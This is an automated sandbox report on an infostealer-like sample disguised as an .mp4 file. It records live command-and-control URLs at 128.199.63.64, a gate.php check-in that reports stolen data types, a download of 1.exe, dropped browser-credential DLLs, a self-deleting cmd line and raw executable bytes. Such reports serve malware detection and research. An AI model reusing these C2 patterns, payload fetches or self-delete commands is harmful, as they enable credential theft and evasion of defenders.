popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

cock.mp4

Gen1 VMProtect UPX Malicious Library Malicious Packer PE File OS Processor Check PE32 DLL
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 19, 2021, 9:42 a.m. Oct. 19, 2021, 9:53 a.m.
Size 4.2MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d050948cba26749ca0ae38c401cae549
SHA256 ebcfd0fc3ecbf9281e9f42e858be21770fd7e3d92facd23d3dc589f01b1a1091
CRC32 6FA5B062
ssdeep 98304:Jf0gnUUlBQgyoOqHAvtgWgyuccfQ+qDh/d8:h0gUUlqHqMgyuTfQ2
Yara
  • VMProtect_Zero - VMProtect packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
128.199.63.64 Active Moloch
164.124.101.2 Active Moloch
185.121.177.177 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2018752 ET MALWARE Generic .bin download from Dotted Quad A Network Trojan was detected
TCP 128.199.63.64:80 -> 192.168.56.101:49198 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 128.199.63.64:80 -> 192.168.56.101:49198 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2022818 ET MALWARE Generic gate .php GET with minimal headers A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2022986 ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2030802 ET HUNTING Suspicious GET To gate.php with no Referer Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2022818 ET MALWARE Generic gate .php GET with minimal headers A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2022986 ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2030802 ET HUNTING Suspicious GET To gate.php with no Referer Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2022818 ET MALWARE Generic gate .php GET with minimal headers A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2022986 ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2030802 ET HUNTING Suspicious GET To gate.php with no Referer Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2022818 ET MALWARE Generic gate .php GET with minimal headers A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2022986 ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2030802 ET HUNTING Suspicious GET To gate.php with no Referer Potentially Bad Traffic
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49198 -> 128.199.63.64:80 2018581 ET MALWARE Single char EXE direct download likely trojan (multiple families) A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\cock.mp4
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: Active code page: 65001
console_handle: 0x00000013
1 1 0

WriteConsoleA

 buffer: Pinging 127.0.0.1
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: with 32 bytes of data:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Reply from 127.0.0.1:
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: bytes=32
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: time<1ms
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: TTL=128
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Ping statistics for 127.0.0.1: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle: 0x00000007
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .vmp0
section .vmp1
suspicious_features Connection to IP address suspicious_request GET http://128.199.63.64/deepanal/system/assets/bundle.bin
suspicious_features Connection to IP address suspicious_request GET http://128.199.63.64/deepanal/gate.php?type=settings
suspicious_features Connection to IP address suspicious_request GET http://128.199.63.64/deepanal/gate.php?type=ip
suspicious_features Connection to IP address suspicious_request GET http://128.199.63.64/deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1
suspicious_features Connection to IP address suspicious_request GET http://128.199.63.64/deepanal/gate.php?type=loader&tag=traffic3
suspicious_features Connection to IP address suspicious_request GET http://128.199.63.64/hoetnaca/exps/1.exe
request GET http://128.199.63.64/deepanal/system/assets/bundle.bin
request GET http://128.199.63.64/deepanal/gate.php?type=settings
request GET http://128.199.63.64/deepanal/gate.php?type=ip
request GET http://128.199.63.64/deepanal/gate.php?type=report&tag=traffic3&uid=39B06D4D868D1303186797&passwords=0&cookies=0&autofill=0&cc=0&wallets=0&steam=0&battlenet=0&telegram=1&discord=0&jabber=0&vpn=0&ftp=1
request GET http://128.199.63.64/deepanal/gate.php?type=loader&tag=traffic3
request GET http://128.199.63.64/hoetnaca/exps/1.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00240000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00260000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00270000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00280000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00290000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x002a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2232
region_size: 73728
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef90000
allocation_type: 1060864 (MEM_COMMIT|MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a00000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a20000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a30000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1892
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a40000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1892
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7efa0000
allocation_type: 1060864 (MEM_COMMIT|MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1892
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 876544
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773b0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 13711183872
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\freebl3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\mozglue.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\twain_32.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\1.exe
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\vcruntime140.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\nss3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\zip.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l1-2-0.dll
cmdline cmd.exe /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
cmdline "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
file C:\Users\test22\AppData\Local\Temp\1.exe
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\freebl3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\twain_32.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\nss3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\cock.mp4
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\1.exe
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\zip.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\mozglue.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\vcruntime140.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\$Zip$1V9WksoRwrP6PM9qvY2a\api-ms-win-core-synch-l1-2-0.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\test22\AppData\Local\Temp\cock.mp4"
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000002bc
process_name: mobsync.exe
process_identifier: 2540
1 1 0

Process32NextW

 snapshot_handle: 0x000002bc
process_name: pw.exe
process_identifier: 3056
1 1 0

Process32NextW

 snapshot_handle: 0x000002bc
process_name: cock.mp4
process_identifier: 2232
1 1 0

Process32NextW

 snapshot_handle: 0x00000114
process_name: 1.exe
process_identifier: 1892
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2232
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x00240000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Áf=߅SŒ…SŒ…SŒ\s¬Œ„SŒ\sQ„SŒRich…SŒPEL`âÅ`à! O0O@O.rsrcOO@@ €e€f(€g@€hX€ip€jˆ€k €l¸€mЀnè€o€p€q0€rH€s`€tx€u€v¨€wÀ€xØ€yð€z€{ €|8€}P€~h€€€€˜€°€ÈØèø(8HXhxˆ˜¨¸ÈØèø(8HXhxˆ Ø í(  W¨l I°µ O¸ KÀO qÈÀ gÐ' Y؀ _àß _è>QðIøظ°Þ¸shR5@C¨•6(ëЀ=¸9 ˆºG¸·@rKGH¹KGPLQXQLI`šLIhãLIp,MKxwMI€ÀMˆÝNKMZÿÿ¸@øº´ Í!¸LÍ!This program canno
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: ; ;$;X;h;Ð<Ô<Ø<Ü<à<ä<è<ì<ð<ô<ø<ü<˜=œ= =¤=¨=¬=°=´=¸=¼=À=Ä=È=Ì=Ð=Ô=Ø=Ü=à=ä=è=ì=ð=ô=ø=ü=>>> >>>>> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>€>„>ˆ>Œ>>”>˜>œ> >¤>¨>¬>°>´>¸>¼>À>Ä>È>Ì>Ð>Ô>Ø>Ü>à>ä>è>ì>ð>ô>ø>ü>??? ????? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?€?„?ˆ?Œ??”?˜?œ? ?¤?¨?¬?°?´?¸?¼?À?Ä?È?Ì?Ð?Ô?Ø?Ü?à?ä?è?ì?ð?ô?ø?ü?`000 00000 0$0(0,0004080<0@0D0H0L0P0T0T3X3`34(444L4P4l4p4Œ44¬4°4Ì4Ð4ð45,505P5p55°5Ð5ð5606P6p66°6Ð6ð6707P7p77°7Ð7ð78,808 ìÐ1Ô1Ø1Ü17H7X7h7x7ˆ7 7¬7°7´7Ð7Ô7ˆ8˜8œ8 8¤8¨8¬8°8´8¸8¼8È8Ì8Ð8Ô8Ø8Ü8à8ä8::H;L;P;T;X;\;`;d;h;l;p;t;x;|;€;„;ˆ;Œ; ;°;È;Ø;ð;<<(<@<P<h<x<< <¸<È<à<ð<==0=@=X=h=€==¨=¸=Ð=à=ø=> >0>X>p>t>x>€>˜>¨>Ð>è>ì>ð>ø>? ?8?H?`?p?ˆ?˜?°?À?Ø?è?° 00(080P0`0x0ˆ0 0°0È0Ø0ð011(1@1P1h1x11 1¸1È1à1ð12202@2X2h2€22¨2¸2Ð2à2ø23 303H3L3P3T3X3p3t3x3|3€3˜3œ3 3¤3¨3À3Ä3È3Ì3Ð3è3ì3ð3ô3ø34444 484<4@4D4H4X4`4p4€4ˆ4˜4¨4°4À4è45(585P5`5x5|5€5„5ˆ5Œ55”5˜5œ5 5¤5¨5¬5°5´5¸5¼5È5Ð5à5ð5ø566 606@6H6X6h6p6€6˜6¨6À6Ð6è6ø6`8d8h8l8p8ˆ8Œ88”8˜8°8´8¸8¼8À8Ø8Ü8à8ä8è8999 99(9,9094989P9T9X9\9`9x9|9€9„9ˆ9 9¤9¨9¬9°9È9Ì9Ð9Ô9Ø9ð9ô9ø9ü9::: :$:(:@:D:H:L:P:h:l:p:t:x::”:˜:œ: :¸:¼:À:Ä:È:Ì:Ð:Ô:Ø:Ü:à:ä:è:ì:ð:ô:ø:ü:;; ;;$;(;0;4;<;@;H;T;X;`;d;l;p;x;|;„;;œ; ;¨;¬;´;¸;À;Ä;Ì;Ð;Ø;Ü;ä;è;ð;ô;ü;<< <<< <$<,<0<8<<<D<H<P<T<\<`<h<l<t<x<€<„<Œ<<˜<¤<°<´<¼<À<È<Ì<Ô<Ø<à<ä<ì<ð<ø<ü<===== =(=,=4=8=@=D=L=P=X=\=d=h=p=t=|=€=ˆ=Œ=”=˜= =¤=¬=°=¸=¼=Ä=È=Ð=Ô=Ü=à=è=ô=ø=>> >>$>0><>H>T>`>d>l>p>x>|>„>>œ>¨>´>¸>Ð>à>ø>? ?0?8?@?H?P?h?p??”?˜?œ? ?¤?¨?¬?°?´?¸?¼?À?Ä?È?Ì?Ð?Ô?MZÿÿ¸@º´ Í!¸LÍ!This program canno
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: Ø?ó?L<0E0N0W0‚0¤0È0:1é1û1 2y2Ø233¡3À3ñ3C5}6˜6®6Ä6Ì60:8;I;É=&>+>=>[>o>u> ,ò2a3r3ƒ3­34"4¾4Ò4ã45}5‘526x768m9°`L1\1`1d1h1l1x1|1€11”1œ1 1¨1°1¸1À1È1Ð1Ø1à1è1ð1ø12222 2(20282@2H2P2X2`2h2p2x2€2ˆ22˜2 2¨2°2¸2À2È2Ð2Ø2à2è2ð2ø23333 3(30383@3H3P3X3`3h3p3x3€3ˆ33˜3 3¨3°3¸3À3È3Ð3Ø3à3è3ð3ø34444 4(40484@4H4P4X4`4h4p4x4€4ˆ44˜4 4¨4°4¸4À4È4Ð4Ø4à4è4ð4ø45555@;D;H;À>È>Ð>Ô>Ø>Ü>à>ä>è>ì>ô>ø>ü>??? ???$?,?0?4?8?<?H?L?P?T?X?\?`?d?h?l?p?t?x?|?€?„?ˆ?Œ??”?ÀÀx4|4€4„4ˆ4Œ44”4˜4œ4 4¤4¨4¬4°4´4¸4¼4À4Ä4È4Ì4Ð4Ô4Ø4Ü4à4ä4è4ì4ð4ô4ø4ü4555 55555 5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5€5„5ˆ5Œ55”5˜5œ5 5¤5¨5¬5°5´5¸5¼5À5Ä5È5Ì5Ð5Ô5Ø5¼9À9Ä9È9ÐÐ 222$2,242<2D2L2T2\2d2l2t2|2„2Œ2”2œ2¤2¬2´2¼2Ä2Ì2Ô2Ü2ä2ì2ô2ü23 333$3,343<3D3L3T3\3d3l3t3|3„3Œ3”3œ3¤3¬3´3¼3Ä3Ì3Ô3Ü3ä3ì3ô3ü34 444$4,444<4D4L4T4\4d4l4t4|4„4Œ4”4œ4¤4¬4´4¼4Ä4Ì4Ô4Ü4ä4ì4ô4ü45 555$5,545<5D5L5T5\5d5l5t5|5„5Œ5”5œ5¤5¬5´5¼5Ä5Ì5Ô5Ü5ä5ì5ô5ü56 666$6,646<6D6L6T6\6d6l6t6|6„6Œ6”6œ6¤6¬6´6¼6Ä6Ì6Ô6Ü6ä6ì6ô6ü67 777$7,747<7D7L7T7\7d7l7t7|7„7Œ7”7œ7¤7¬7´7¼7Ä7Ì7Ô7Ü7ä7ì7ô7ü78 888$8,848<8D8L8T8\8d8l8t8|8„8Œ8”8œ8¤8¬8´8¼8Ä8Ì8Ô8Ü8ä8ì8ô8ü89 999$9àÐ0383@3H3P3X3`3h3p3x3€3ˆ33˜3 3¨3°3¸3À3È3Ð3Ø3à3è3ð3ø34444 4(40484@4H4P4X4`4h4p4x4€4ˆ44˜4 4¨4°4¸4À4È4Ð4Ø4à4è4ð4ø45555 5(50585@5H5P5X5`5h5p5x5€5ˆ55˜5 5¨5°5¸5À5È5Ð5Ø5à5è5ð5ø56666 6(60686@6H6P6X6`6h6p6x6€6ˆ66˜6 6¨6°6¸6À6È6Ð6Ø6à6è6ð6ø67777 7(70787@7H7P7X7`7h7p7x7€7ˆ77˜7 7¨7°7¸7À7È7Ð7Ø7à7è7ð7ø78888 8(80888@8H8P8X8`8h8p8x8€8ˆ88˜8 8¨8°8¸8À8È8Ð8Ø8à8è8ð8ø89999 9(90989@9H9P9X9`9h9p9x9€9ˆ99˜9 9¨9°9¸9À9È9Ð9Ø9à9è9ð9ø9:::: :(:0:8:@:H:ðL:4>4B4F4L=T=\=d=l=t=|=„=Œ=”=œ=¤=¬=´=¼=Ä=Ì=Ô=Ü=ä=ì=ô=ü=> >>>$>,>lL:P:X:; ;,;D;H;d;h;„;ˆ;¨;È;è;<(<H<h<ˆ<¨<È<ä<è<=(=D=H=h=ˆ=¨=È=è=>(>H>h>ˆ>¨>È>è>?(?H?h?ˆ?¨?È?è?0(0H0h0„0ˆ0 PÐ1Ô1Ø1Ü1¨2Ø2è2ø23303<3@3D3`3d3È9Ð9Ô9Ø9Ü9à9ä9è9ì9ð9ô9::: :::::MZÿÿ¸@¸º´ Í!¸LÍ!This program canno
request_handle: 0x00cc000c
1 1 0

InternetReadFile

